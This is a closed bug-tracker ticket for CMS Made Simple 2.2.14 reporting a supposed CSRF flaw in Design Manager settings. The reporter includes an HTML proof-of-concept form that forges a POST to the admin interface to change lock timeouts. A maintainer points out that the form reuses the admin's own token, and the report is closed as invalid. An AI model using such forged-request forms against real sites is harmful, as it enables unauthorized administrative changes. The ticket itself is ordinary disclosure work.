CMS MADE SIMPLE FORGE

CMS Made Simple Core

 
Back Back to List

[#12315] CSRF on Settings - Design Manager

avatar
Created By: rahul gautam (G@merited)
Date Submitted: Fri May 29 07:39:02 -0400 2020

Assigned To: Fernando Morgado (JoMorg)
Version: 2.2.14
CMSMS Version: 2.2.14
Severity: Minor
Resolution: Invalid
State: Closed
Summary:
CSRF on Settings - Design Manager
Detailed Description:
hello,

  I discovered a CSRF vulnerablity no Settings - Design Manager

Steps to reproduce,

1) Capture the request of changing Locking
2) check all the data extract and make a html data for example 

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
<form
action="http://cms.pick/cmsms-2.2.14-install/admin/moduleinterface.php"
method="POST" enctype="multipart/form-data">
<input type="hidden" name="mact"
value="DesignManager&#44;m1&#95;&#44;admin&#95;settings&#44;0" />
      <input type="hidden" name="&#95;&#95;c" value="543fbd2ceebe218581e" />
      <input type="hidden" name="m1&#95;submit" value="Submit" />
      <input type="hidden" name="m1&#95;lock&#95;timeout" value="90" />
      <input type="hidden" name="m1&#95;lock&#95;refresh" value="120" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

3) play with the value in and change it
4) send it to the admin and click submit request
5) The lockout time is changed for admin

This vulnerability affects the CMS Made Simple latest version (2.2.14) and
below. The vulnerability can be mitigated by  using CSRF tokens


History

Comments
avatar 
Date: 2020-05-29 10:24
Posted By: Ruud van der Velden (ruudvdvelden)

As far as I can see you're already using the CSRF token of the logged in admin.
(543fbd2ceebe218581e)

So I don't see (yet) how this is a vulnerability.

For it to be a vulnerability it should be exploitable without having access to
the admin user's secret.
avatar 
Date: 2020-05-29 10:31
Posted By: rahul gautam (G@merited)

Oh for the moment i am sorry i thought it had to do something with the value of
the settings, I dint notice that
Updates

Updated: 2020-09-02 15:07
resolution_id: => 9
state: Open => Closed